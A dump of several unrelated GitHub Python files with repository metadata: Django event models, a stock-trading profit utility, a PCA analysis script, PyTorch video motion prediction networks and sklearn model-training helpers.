facebook_link = models.URLField(default="", blank=True)
instagram_link = models.URLField(default="", blank=True)
twitter_link = models.URLField(default="", blank=True)
def __str__(self):
return "{} {}".format(self.nombre, self.apellido)
class Evento(models.Model):
OPCIONES_TIPO = (
('REC', 'REC'),
('RAC', 'RAC'),
('RIO', 'RIO'),
('Legado', 'Legado'),
)
nombre = models.CharField(unique=True, max_length=254)
descripcion = models.TextField()
tipo = models.CharField(max_length=50, choices=OPCIONES_TIPO)
fecha = models.DateField()
pais = models.CharField(max_length=100)
localidad = models.CharField(max_length=100)
badge = models.ImageField(upload_to="eventos/")
miembros = models.ManyToManyField(Miembro, through='Participacion')
def __str__(self):
return self.nombre
class Participacion(models.Model):
OPCIONES_ROL = (
('Participante', 'Participante'),
('Coordinación', 'Coordinación'),
('Sub Coordinación', 'Sub Coordinación'),
('Administración', 'Administración'),
('Jefe de Tribu', 'Jefe de Tribu'),
('Voz', 'Voz'),
('Logística', 'Logística'),
('Evento', 'Evento'),
('Seguridad', 'Seguridad'),
('Apoyo', 'Apoyo'),
)
miembro = models.ForeignKey(Miembro)
evento = models.ForeignKey(Evento)
rol = models.CharField(max_length=50, choices=OPCIONES_ROL)
descripcion = models.TextField()
class Meta:
verbose_name_plural = 'Participaciones'
def __str__(self):
return "{} - {}".format(self.miembro, self.evento)
|
[
"asapper@hotmail.com"
] |
asapper@hotmail.com
|
38b35d907e3cb5df8b3ff6681ee2767e98485de2
|
23aeb04d1092ed6238f65ab53b5afd79e94ed5ec
|
/utility.py
|
903872febddf569b569d321f172381f638ac3fee
|
[] |
no_license
|
DixitNitin/Stock_prediction
|
df8bb569efc72a03347d9d498cae83222d7ee639
|
898e0002a15cad68fc8c90375317f0f5e3ba7f46
|
refs/heads/master
| 2020-06-21T20:17:54.640708
| 2019-07-24T08:40:53
| 2019-07-24T08:40:53
| 197,544,100
| 0
| 2
| null | 2019-07-23T12:15:33
| 2019-07-18T08:19:56
|
Python
|
UTF-8
|
Python
| false
| false
| 2,953
|
py
|
import pandas as pd
import datetime
from decimal import *
def daterange(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)
# input data : id, time, symbol, open, high, low, close
# outout data: id, week, symbol, open, high, low, close
def convertToWeekly(data):
weekly = []
last_week = -1
for i, row in data.iterrows():
curr_week = GetWeek(row["timestamp"])
if(curr_week != last_week):
this_Week = row
this_Week["timestamp"] = curr_week
if(last_week != -1):
weekly.append(this_Week)
last_week = curr_week
else:
if(Decimal(row["high"]) > this_Week["high"]):
this_Week["high"] = Decimal(row["high"])
if(Decimal(row["low"]) < Decimal(this_Week["low"])):
this_Week["low"] = Decimal(row["low"])
this_Week["close"] = Decimal(row["close"])
return pd.DataFrame(weekly)
# input data : id, time, symbol, open, high, low, close
# output : time : median
def CalculateMedian(data):
median = []
for i, row in data.iterrows():
med = Decimal(Decimal(row["open"]) + Decimal(row["close"])) / 2
median.append([row["timestamp"], med])
return pd.DataFrame(median, columns = ['timestamp','median'])
def GetWeek(date):
return Decimal(date.isocalendar()[0] * 100) + date.isocalendar()[1]
#trade : symbol, date, price, Buy/Sell
def Calculateprofit(trades):
volume = 1
isbuy = False
buyprice = 0.0
sellprice = 0.0
buydate = datetime.date(2010,1,1)
selldate = datetime.date(2010,1,1)
profit = 0.0
tradecount = 0
tradedays = 0.0
for i, val in trades.iterrows():
if(val['trade'] == 'BUY'):
if (isbuy):
print ("BUY and isbuy true", val)
buyprice = ((volume * buyprice) + val['price'] )/ (volume + 1)
buydate += (val['timestamp'] - buydate) / (volume + 1)
volume += 1
else:
print ("BUY and isbuy false", val)
profit = Decimal(profit) + (Decimal((Decimal(sellprice) - Decimal(val['price'])) * Decimal(volume)))
tradedays = Decimal(tradedays) + (Decimal((val['timestamp'] - selldate).days) * Decimal(volume))
tradecount += volume
buyprice = val['price']
buydate = val['timestamp']
volume = 1
isbuy = True
if(val['trade'] == 'SELL'):
if (isbuy):
profit = Decimal(profit) + (Decimal((Decimal(val['price']) - Decimal(buyprice)) * Decimal(volume)))
tradedays = Decimal(tradedays) + (Decimal((val['timestamp'] - buydate).days) * Decimal(volume))
tradecount += volume
sellprice = val['price']
selldate = val['timestamp']
volume = 1
isbuy = False
print ("SELL and isbuy true", val, profit, tradedays)
if(tradecount > 0):
print ('profit per trade : ' , profit/tradecount)
print ('Days per trade : ' , tradedays/tradecount)
print ('profit per trade per day : ' , (profit/tradecount)/(tradedays/tradecount))
print ('No of trade : ' , tradecount)
|
[
"noreply@github.com"
] |
DixitNitin.noreply@github.com
|
eb6a637ea84d36e185a6db53af40a0ca7dbf62de
|
4a11712cbae24052121fc87279a0a7201bbc4388
|
/Unsupervised Learning/Experiment 2/PCA/cancer_PCA.py
|
30ec6fd032b3ccb8c7bc67b5feb7fbaf11310d78
|
[] |
no_license
|
Timbabs/Machine-Learning
|
3c66fef4a0f8ff5252a8911d06e3e3c6bd7c05d9
|
8cb2d55b546cb1a77da247a179f3b1e8817b078a
|
refs/heads/master
| 2021-05-09T16:35:37.186775
| 2018-01-27T01:18:38
| 2018-01-27T01:18:38
| 109,227,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,792
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
import numpy as np
import pylab
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import proj3d
from mpl_toolkits.mplot3d import Axes3D
feature_cols_label = ['worst_perimeter', 'mean_concativity', 'mean_area', 'label']
wisconsin = pd.read_csv('../../utils/data.csv', names=feature_cols_label)
array = wisconsin[feature_cols_label].values
X = array[:,0:3]
scaler = StandardScaler()
X = scaler.fit_transform(X)
y = array[:,3]
# -----------------------------------------------------------------------------------------------------------------
pca = PCA(n_components=2)
fit = pca.fit(X)
# fig1 = plt.figure(1)
# ax = Axes3D(fig1)
# #
# ax.scatter(X[:, 0], X[:, 2], X[:, 1], alpha=0.2)
#
# x22, y22, _ = proj3d.proj_transform((pca.mean_)[0], (pca.mean_)[2], (pca.mean_)[1], ax.get_proj())
# v0 = (x22, y22)
#
# def draw_vector(v):
# arrowprops=dict(arrowstyle='->', linewidth=2, shrinkA=0, shrinkB=0)
# pylab.annotate('', xy = v, xytext=v0, arrowprops = arrowprops)
#
# for length, vector in zip(pca.explained_variance_, pca.components_):
# v = vector * 3 * np.sqrt(length)
# x2, y2, _ = proj3d.proj_transform((pca.mean_ + v)[0], (pca.mean_ + v)[2], (pca.mean_ + v)[1], ax.get_proj())
# v = (x2, y2)
# draw_vector(v)
#
# ax.set_xlabel('worst_perimeter')
# ax.set_ylabel('mean_area')
# ax.set_zlabel('mean_concativity')
# ax.set_title('input features')
# plt.savefig('inputProjCancer.png', dpi=300)
# pylab.show()
# def draw_vector(v0, v1, ax=None):
# ax = ax or plt.gca()
# arrowprops = dict(arrowstyle='->',
# linewidth=2,
# shrinkA=0, shrinkB=0)
# ax.annotate('', v1, v0, arrowprops=arrowprops)
#
# # plot data
#
# fig = plt.figure(2)
# X = pca.transform(X)
# pca.fit(X)
#
#
# plt.scatter(X[:, 0], X[:, 1], alpha=0.2)
# for length, vector in zip(pca.explained_variance_, pca.components_):
# v = vector * 3 * np.sqrt(length)
# draw_vector(pca.mean_, pca.mean_ + v)
#
# plt.xlabel('component 1')
# plt.ylabel('component 2')
# plt.title('principal components')
# plt.savefig('principalProjCancer.png', dpi=300)
# plt.show()
#
# # #
# fig1 = plt.figure(1)
# ax = Axes3D(fig1)
#
# X_pca = pca.transform(X)
#
# # df = pd.DataFrame(X_pca)
# # df.to_csv('pca_cancer_reduced.csv', index=0, header=0)
#
# X_new = pca.inverse_transform(X_pca)
#
# ax.scatter(X[:, 2], X[:, 1], X[:, 0], alpha=0.2, label='original data (3 features)')
# ax.scatter(X_new[:, 2], X_new[:, 1], X[:, 0], alpha=0.8, label='projected data (2 components)')
# ax.legend(loc='best')
#
# #plt.savefig('comboProjCancer.png', dpi=300)
# pylab.show()
# projected = pca.transform(X)
# plt.scatter(projected[:, 0], projected[:, 1],
# c=y, edgecolor='none', alpha=0.5,
# cmap=plt.cm.get_cmap('spectral', 10))
# plt.xlabel('component 1')
# plt.ylabel('component 2')
# plt.colorbar()
# plt.savefig('3_PCACancer.png', dpi=300)
# plt.show()
# -----------------------------------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------------------------------
cov_mat = np.corrcoef(X.T)
eig_vals, eig_vecs = np.linalg.eig(cov_mat)
print(eig_vals)
#
# tot = sum(eig_vals)
# var_exp = [(i / tot) for i in sorted(eig_vals, reverse=True)]
# cum_var_exp = np.cumsum(var_exp)
#
# plt.bar(range(1, 4), var_exp, alpha=0.5, align='center', label='individual explained variance')
# plt.step(range(1, 4), cum_var_exp, where='mid', label='cumulative explained variance')
# plt.ylabel('Explained variance ratio')
# plt.xlabel('Principal components')
# plt.legend(loc='best')
# plt.savefig('k_cancerPCA.png')
# plt.show()
# -----------------------------------------------------------------------------------------------------------------
#
# fig2 = plt.figure(2)
# ax = Axes3D(fig2)
#
# LABEL_COLOR_MAP = {0: 'g',
# 1: 'r'
# }
# #
# label_color = [LABEL_COLOR_MAP[l] for l in y]
#
# ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=label_color)
# #
# #
# import matplotlib
#
# scatter1_proxy = matplotlib.lines.Line2D([0], [0], linestyle="none", c=LABEL_COLOR_MAP[0], marker='o')
# scatter2_proxy = matplotlib.lines.Line2D([0], [0], linestyle="none", c=LABEL_COLOR_MAP[1], marker='o')
# ax.legend([scatter1_proxy, scatter2_proxy], ['diabetes negative', 'diabetes positive'], numpoints=2)
#
#
# ax.set_xlabel('principal component 1')
# ax.set_ylabel('principal component 2')
# ax.set_zlabel('principal component 3')
# ax.set_title('3 Principal components Analysis')
#
#
# fig2.savefig('3_PCA.png', dpi=300)
#
#
# plt.show()
#
|
[
"timothyybaba@gmail.com"
] |
timothyybaba@gmail.com
|
936a7f5e2ce3a10d6bee07b1add9629e34d6c785
|
f6641c552622e1446d913d50f561ff14c524e885
|
/models/models_old6.py
|
4c2d0c04149ca4a51df23468554ac0b227271ea2
|
[] |
no_license
|
yangyi02/video_motion_synthetic3
|
939d1ddd3a4caada87e0e2ef3ed430dae9b2447e
|
e732d3641c555422b977648211683cb21186bcdb
|
refs/heads/master
| 2021-01-01T06:46:55.553125
| 2017-08-04T00:19:28
| 2017-08-04T00:19:28
| 97,509,008
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,084
|
py
|
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torch.nn.functional as F
import math
class Net(nn.Module):
def __init__(self, im_height, im_width, im_channel, n_inputs, n_class, m_range, m_kernel):
super(Net, self).__init__()
num_hidden = 64
self.conv0 = nn.Conv2d(n_inputs*im_channel, num_hidden, 3, 1, 1)
self.bn0 = nn.BatchNorm2d(num_hidden)
self.conv1 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn1 = nn.BatchNorm2d(num_hidden)
self.conv2 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn2 = nn.BatchNorm2d(num_hidden)
self.conv3 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn3 = nn.BatchNorm2d(num_hidden)
self.conv4 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn4 = nn.BatchNorm2d(num_hidden)
self.conv5 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn5 = nn.BatchNorm2d(num_hidden)
self.conv6 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn6 = nn.BatchNorm2d(num_hidden)
self.conv7 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn7 = nn.BatchNorm2d(num_hidden)
self.conv8 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn8 = nn.BatchNorm2d(num_hidden)
self.conv9 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn9 = nn.BatchNorm2d(num_hidden)
self.conv10 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn10 = nn.BatchNorm2d(num_hidden)
self.conv11 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn11 = nn.BatchNorm2d(num_hidden)
self.conv_x = nn.Conv2d(num_hidden, int(math.sqrt(n_class)), 3, 1, 1)
self.conv_y = nn.Conv2d(num_hidden, int(math.sqrt(n_class)), 3, 1, 1)
num_hidden2 = 64
self.conv_s0 = nn.Conv2d(im_channel, num_hidden2, 3, 1, 1)
self.bn_s0 = nn.BatchNorm2d(num_hidden2)
self.conv_s1 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s1 = nn.BatchNorm2d(num_hidden2)
self.conv_s2 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s2 = nn.BatchNorm2d(num_hidden2)
self.conv_s3 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s3 = nn.BatchNorm2d(num_hidden2)
self.conv_s4 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s4 = nn.BatchNorm2d(num_hidden2)
self.conv_s5 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s5 = nn.BatchNorm2d(num_hidden2)
self.conv_s6 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s6 = nn.BatchNorm2d(num_hidden2)
self.conv_s7 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s7 = nn.BatchNorm2d(num_hidden2)
self.conv_s8 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s8 = nn.BatchNorm2d(num_hidden2)
self.conv_s9 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s9 = nn.BatchNorm2d(num_hidden2)
self.conv_s10 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s10 = nn.BatchNorm2d(num_hidden2)
self.conv_s11 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s11 = nn.BatchNorm2d(num_hidden2)
self.conv_s = nn.Conv2d(num_hidden2, 1, 3, 1, 1)
self.maxpool = nn.MaxPool2d(2, stride=2, return_indices=False, ceil_mode=False)
self.upsample = nn.UpsamplingBilinear2d(scale_factor=2)
self.im_height = im_height
self.im_width = im_width
self.im_channel = im_channel
self.n_inputs = n_inputs
self.n_class = n_class
self.m_range = m_range
self.m_kernel = m_kernel
def forward(self, im_input):
x = self.bn0(self.conv0(im_input))
x1 = F.relu(self.bn1(self.conv1(x)))
x2 = self.maxpool(x1)
x2 = F.relu(self.bn2(self.conv2(x2)))
x3 = self.maxpool(x2)
x3 = F.relu(self.bn3(self.conv3(x3)))
x4 = self.maxpool(x3)
x4 = F.relu(self.bn4(self.conv4(x4)))
x5 = self.maxpool(x4)
x5 = F.relu(self.bn5(self.conv5(x5)))
x6 = self.maxpool(x5)
x6 = F.relu(self.bn6(self.conv6(x6)))
x6 = self.upsample(x6)
x7 = torch.cat((x6, x5), 1)
x7 = F.relu(self.bn7(self.conv7(x7)))
x7 = self.upsample(x7)
x8 = torch.cat((x7, x4), 1)
x8 = F.relu(self.bn8(self.conv8(x8)))
x8 = self.upsample(x8)
x9 = torch.cat((x8, x3), 1)
x9 = F.relu(self.bn9(self.conv9(x9)))
x9 = self.upsample(x9)
x10 = torch.cat((x9, x2), 1)
x10 = F.relu(self.bn10(self.conv10(x10)))
x10 = self.upsample(x10)
x11 = torch.cat((x10, x1), 1)
x11 = F.relu(self.bn11(self.conv11(x11)))
motion_x = self.conv_x(x11)
motion_y = self.conv_y(x11)
m_mask_x = F.softmax(motion_x)
m_mask_y = F.softmax(motion_y)
m_mask_x = m_mask_x.unsqueeze(1).expand(m_mask_x.size(0), m_mask_x.size(1), m_mask_x.size(1), m_mask_x.size(2), m_mask_x.size(3)).contiguous()
m_mask_x = m_mask_x.view(m_mask_x.size(0), -1, m_mask_x.size(3), m_mask_x.size(4))
m_mask_y = m_mask_y.unsqueeze(2).expand(m_mask_y.size(0), m_mask_y.size(1), m_mask_y.size(1), m_mask_y.size(2), m_mask_y.size(3)).contiguous()
m_mask_y = m_mask_y.view(m_mask_y.size(0), -1, m_mask_y.size(3), m_mask_y.size(4))
m_mask = m_mask_x * m_mask_y
x = self.bn_s0(self.conv_s0(im_input[:, -self.im_channel:, :, :]))
x1 = F.relu(self.bn_s1(self.conv_s1(x)))
x2 = self.maxpool(x1)
x2 = F.relu(self.bn_s2(self.conv_s2(x2)))
x3 = self.maxpool(x2)
x3 = F.relu(self.bn_s3(self.conv_s3(x3)))
x4 = self.maxpool(x3)
x4 = F.relu(self.bn_s4(self.conv_s4(x4)))
x5 = self.maxpool(x4)
x5 = F.relu(self.bn_s5(self.conv_s5(x5)))
x6 = self.maxpool(x5)
x6 = F.relu(self.bn_s6(self.conv_s6(x6)))
x6 = self.upsample(x6)
x7 = torch.cat((x6, x5), 1)
x7 = F.relu(self.bn_s7(self.conv_s7(x7)))
x7 = self.upsample(x7)
x8 = torch.cat((x7, x4), 1)
x8 = F.relu(self.bn_s8(self.conv_s8(x8)))
x8 = self.upsample(x8)
x9 = torch.cat((x8, x3), 1)
x9 = F.relu(self.bn_s9(self.conv_s9(x9)))
x9 = self.upsample(x9)
x10 = torch.cat((x9, x2), 1)
x10 = F.relu(self.bn_s10(self.conv_s10(x10)))
x10 = self.upsample(x10)
x11 = torch.cat((x10, x1), 1)
x11 = F.relu(self.bn_s11(self.conv_s11(x11)))
seg = self.conv_s(x11)
seg = F.sigmoid(seg)
# seg = construct_seg(seg, m_mask, self.m_kernel, self.m_range)
# disappear = F.relu(seg - 1)
# appear = F.relu(1 - disappear)
pred = construct_image(im_input[:, -self.im_channel:, :, :], m_mask, seg, self.m_kernel, self.m_range)
return pred, m_mask, seg
class BiNet(nn.Module):
def __init__(self, im_height, im_width, im_channel, n_inputs, n_class, m_range, m_kernel):
super(BiNet, self).__init__()
num_hidden = 64
self.conv0 = nn.Conv2d(n_inputs*im_channel, num_hidden, 3, 1, 1)
self.bn0 = nn.BatchNorm2d(num_hidden)
self.conv1 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn1 = nn.BatchNorm2d(num_hidden)
self.conv2 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn2 = nn.BatchNorm2d(num_hidden)
self.conv3 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn3 = nn.BatchNorm2d(num_hidden)
self.conv4 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn4 = nn.BatchNorm2d(num_hidden)
self.conv5 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn5 = nn.BatchNorm2d(num_hidden)
self.conv6 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn6 = nn.BatchNorm2d(num_hidden)
self.conv7 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn7 = nn.BatchNorm2d(num_hidden)
self.conv8 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn8 = nn.BatchNorm2d(num_hidden)
self.conv9 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn9 = nn.BatchNorm2d(num_hidden)
self.conv10 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn10 = nn.BatchNorm2d(num_hidden)
self.conv11 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn11 = nn.BatchNorm2d(num_hidden)
self.conv_x = nn.Conv2d(num_hidden, int(math.sqrt(n_class)), 3, 1, 1)
self.conv_y = nn.Conv2d(num_hidden, int(math.sqrt(n_class)), 3, 1, 1)
self.maxpool = nn.MaxPool2d(2, stride=2, return_indices=False, ceil_mode=False)
self.upsample = nn.UpsamplingBilinear2d(scale_factor=2)
self.im_height = im_height
self.im_width = im_width
self.im_channel = im_channel
self.n_inputs = n_inputs
self.n_class = n_class
self.m_range = m_range
self.m_kernel = m_kernel
def forward(self, im_input_f, im_input_b):
x = self.bn0(self.conv0(im_input_f))
x1 = F.relu(self.bn1(self.conv1(x)))
x2 = self.maxpool(x1)
x2 = F.relu(self.bn2(self.conv2(x2)))
x3 = self.maxpool(x2)
x3 = F.relu(self.bn3(self.conv3(x3)))
x4 = self.maxpool(x3)
x4 = F.relu(self.bn4(self.conv4(x4)))
x5 = self.maxpool(x4)
x5 = F.relu(self.bn5(self.conv5(x5)))
x6 = self.maxpool(x5)
x6 = F.relu(self.bn6(self.conv6(x6)))
x6 = self.upsample(x6)
x7 = torch.cat((x6, x5), 1)
x7 = F.relu(self.bn7(self.conv7(x7)))
x7 = self.upsample(x7)
x8 = torch.cat((x7, x4), 1)
x8 = F.relu(self.bn8(self.conv8(x8)))
x8 = self.upsample(x8)
x9 = torch.cat((x8, x3), 1)
x9 = F.relu(self.bn9(self.conv9(x9)))
x9 = self.upsample(x9)
x10 = torch.cat((x9, x2), 1)
x10 = F.relu(self.bn10(self.conv10(x10)))
x10 = self.upsample(x10)
x11 = torch.cat((x10, x1), 1)
x11 = F.relu(self.bn11(self.conv11(x11)))
motion_f_x = self.conv_x(x11)
motion_f_y = self.conv_y(x11)
x = self.bn0(self.conv0(im_input_b))
x1 = F.relu(self.bn1(self.conv1(x)))
x2 = self.maxpool(x1)
x2 = F.relu(self.bn2(self.conv2(x2)))
x3 = self.maxpool(x2)
x3 = F.relu(self.bn3(self.conv3(x3)))
x4 = self.maxpool(x3)
x4 = F.relu(self.bn4(self.conv4(x4)))
x5 = self.maxpool(x4)
x5 = F.relu(self.bn5(self.conv5(x5)))
x6 = self.maxpool(x5)
x6 = F.relu(self.bn6(self.conv6(x6)))
x6 = self.upsample(x6)
x7 = torch.cat((x6, x5), 1)
x7 = F.relu(self.bn7(self.conv7(x7)))
x7 = self.upsample(x7)
x8 = torch.cat((x7, x4), 1)
x8 = F.relu(self.bn8(self.conv8(x8)))
x8 = self.upsample(x8)
x9 = torch.cat((x8, x3), 1)
x9 = F.relu(self.bn9(self.conv9(x9)))
x9 = self.upsample(x9)
x10 = torch.cat((x9, x2), 1)
x10 = F.relu(self.bn10(self.conv10(x10)))
x10 = self.upsample(x10)
x11 = torch.cat((x10, x1), 1)
x11 = F.relu(self.bn11(self.conv11(x11)))
motion_b_x = self.conv_x(x11)
motion_b_y = self.conv_y(x11)
m_mask_f_x = F.softmax(motion_f_x)
m_mask_f_y = F.softmax(motion_f_y)
m_mask_b_x = F.softmax(motion_b_x)
m_mask_b_y = F.softmax(motion_b_y)
m_mask_f_x = m_mask_f_x.unsqueeze(1).expand(m_mask_f_x.size(0), m_mask_f_x.size(1), m_mask_f_x.size(1), m_mask_f_x.size(2), m_mask_f_x.size(3)).contiguous()
m_mask_f_x = m_mask_f_x.view(m_mask_f_x.size(0), -1, m_mask_f_x.size(3), m_mask_f_x.size(4))
m_mask_f_y = m_mask_f_y.unsqueeze(2).expand(m_mask_f_y.size(0), m_mask_f_y.size(1), m_mask_f_y.size(1), m_mask_f_y.size(2), m_mask_f_y.size(3)).contiguous()
m_mask_f_y = m_mask_f_y.view(m_mask_f_y.size(0), -1, m_mask_f_y.size(3), m_mask_f_y.size(4))
m_mask_f = m_mask_f_x * m_mask_f_y
m_mask_b_x = m_mask_b_x.unsqueeze(1).expand(m_mask_b_x.size(0), m_mask_b_x.size(1), m_mask_b_x.size(1), m_mask_b_x.size(2), m_mask_b_x.size(3)).contiguous()
m_mask_b_x = m_mask_b_x.view(m_mask_b_x.size(0), -1, m_mask_b_x.size(3), m_mask_b_x.size(4))
m_mask_b_y = m_mask_b_y.unsqueeze(2).expand(m_mask_b_y.size(0), m_mask_b_y.size(1), m_mask_b_y.size(1), m_mask_b_y.size(2), m_mask_b_y.size(3)).contiguous()
m_mask_b_y = m_mask_b_y.view(m_mask_b_y.size(0), -1, m_mask_b_y.size(3), m_mask_b_y.size(4))
m_mask_b = m_mask_b_x * m_mask_b_y
seg_f = construct_seg(m_mask_f, self.m_kernel, self.m_range)
seg_b = construct_seg(m_mask_b, self.m_kernel, self.m_range)
disappear_f = F.relu(seg_f - 1)
appear_f = F.relu(1 - disappear_f)
disappear_b = F.relu(seg_b - 1)
appear_b = F.relu(1 - disappear_b)
pred_f = construct_image(im_input_f[:, -self.im_channel:, :, :], m_mask_f, appear_f, self.m_kernel, self.m_range)
pred_b = construct_image(im_input_b[:, -self.im_channel:, :, :], m_mask_b, appear_b, self.m_kernel, self.m_range)
seg_f = 1 - F.relu(1 - seg_f)
seg_b = 1 - F.relu(1 - seg_b)
attn = (seg_f + 1e-5) / (seg_f + seg_b + 2e-5)
pred = attn.expand_as(pred_f) * pred_f + (1 - attn.expand_as(pred_b)) * pred_b
return pred, m_mask_f, 1 - appear_f, attn, m_mask_b, 1 - appear_b, 1 - attn
def construct_seg(m_mask, m_kernel, m_range):
seg = Variable(torch.Tensor(m_mask.size(0), 1, m_mask.size(2), m_mask.size(3)))
if torch.cuda.is_available():
seg = seg.cuda()
for i in range(m_mask.size(0)):
seg[i, :, :, :] = F.conv2d(m_mask[i, :, :, :].unsqueeze(0), m_kernel, None, 1, m_range)
return seg
def construct_image(im, m_mask, seg, m_kernel, m_range):
fg = im * seg.expand_as(im)
fg_pred = Variable(torch.Tensor(im.size()))
if torch.cuda.is_available():
fg_pred = fg_pred.cuda()
for i in range(im.size(1)):
im_expand = fg[:, i, :, :].unsqueeze(1).expand_as(m_mask) * m_mask
for j in range(im.size(0)):
fg_pred[j, i, :, :] = F.conv2d(im_expand[j, :, :, :].unsqueeze(0), m_kernel, None, 1, m_range)
bg = im * (1 - seg).expand_as(im)
bg_pred = Variable(torch.Tensor(im.size()))
if torch.cuda.is_available():
bg_pred = bg_pred.cuda()
for i in range(im.size(1)):
im_expand = bg[:, i, :, :].unsqueeze(1).expand_as(m_mask) * m_mask
for j in range(im.size(0)):
bg_pred[j, i, :, :] = F.conv2d(im_expand[j, :, :, :].unsqueeze(0), m_kernel, None, 1, m_range)
seg_expand = seg.expand_as(m_mask) * m_mask
fg_seg = Variable(torch.Tensor(seg.size()))
if torch.cuda.is_available():
fg_seg = fg_seg.cuda()
for i in range(im.size(0)):
fg_seg[i, :, :, :] = F.conv2d(seg_expand[i, :, :, :].unsqueeze(0), m_kernel, None, 1, m_range)
pred = fg_seg.expand_as(im) * fg_pred + (1 - fg_seg).expand_as(im) * bg_pred
return pred
|
[
"yangyi02@gmail.com"
] |
yangyi02@gmail.com
|
71320520c3f27f61cf54ae8386fc3bfc92221343
|
91efac4047d3d6f6826597046fbbaf6fe6243550
|
/model_tuning.py
|
affe07c5ad33388efe3e10dae9e2595f3fe4d81f
|
[] |
no_license
|
santhoshhari/data_utilities
|
77736f943122c217ddfd7ba3c5ef32db32c31e6b
|
c90313d0e0faa6d27b83a2c0b7e443f8b3227cf1
|
refs/heads/master
| 2020-03-28T18:55:15.379669
| 2018-09-27T03:01:58
| 2018-09-27T03:01:58
| 148,926,902
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,475
|
py
|
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import roc_auc_score, mean_squared_error
from xgboost import XGBClassifier, XGBRegressor
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, forest
from sklearn.linear_model import LogisticRegression, Ridge
from .feature_engineering import *
from .random_forest_support import *
from .data_preparation import *
from tqdm import tqdm, tqdm_notebook
tqdm.monitor_interval = 0
def train_rf_model(param_dict, Xtrain, Xvalid, Ytrain, Yvalid,
metric=roc_auc_score, model_type='classification'):
"""
Function to train a random forest model with a given set of hyper-parameters
:param param_dict: Dict of hyper-parameters that are kept constant
:param Xtrain: Train Data
:param Xvalid: Validation Data
:param Ytrain: Train labels
:param Yvalid: Validation labels
:param metric: Metric to compute model performance on
:param model_type: Model type - classification/regression
:return: Tuned model, train score and validation score computed using the metric
"""
if model_type == 'classification':
model = RandomForestClassifier(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict_proba(Xtrain)
valid_preds = model.predict_proba(Xvalid)
train_score = metric(Ytrain, train_preds[:, 1])
valid_score = metric(Yvalid, valid_preds[:, 1])
elif model_type == 'regression':
model = RandomForestRegressor(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict(Xtrain)
valid_preds = model.predict(Xvalid)
train_score = metric(Ytrain, train_preds)
valid_score = metric(Yvalid, valid_preds)
else:
raise ValueError('Incorrect model_type. Accepted values - classification and regression')
return model, train_score, valid_score
def train_linear_model(param_dict, Xtrain, Xvalid, Ytrain, Yvalid,
metric=roc_auc_score, model_type='classification'):
"""
Function to train a linear model with a given set of hyper-parameters
:param param_dict: Dict of hyper-parameters that are kept constant
:param Xtrain: Train Data
:param Xvalid: Validation Data
:param Ytrain: Train labels
:param Yvalid: Validation labels
:param metric: Metric to compute model performance on
:param model_type: Model type - classification/regression
:return: Tuned model, train score and validation score computed using the metric
"""
if model_type == 'classification':
model = LogisticRegression(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict_proba(Xtrain)
valid_preds = model.predict_proba(Xvalid)
train_score = metric(Ytrain, train_preds[:, 1])
valid_score = metric(Yvalid, valid_preds[:, 1])
elif model_type == 'regression':
model = Ridge(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict(Xtrain)
valid_preds = model.predict(Xvalid)
train_score = metric(Ytrain, train_preds)
valid_score = metric(Yvalid, valid_preds)
else:
raise ValueError('Incorrect model_type. Accepted values - classification and regression')
return model, train_score, valid_score
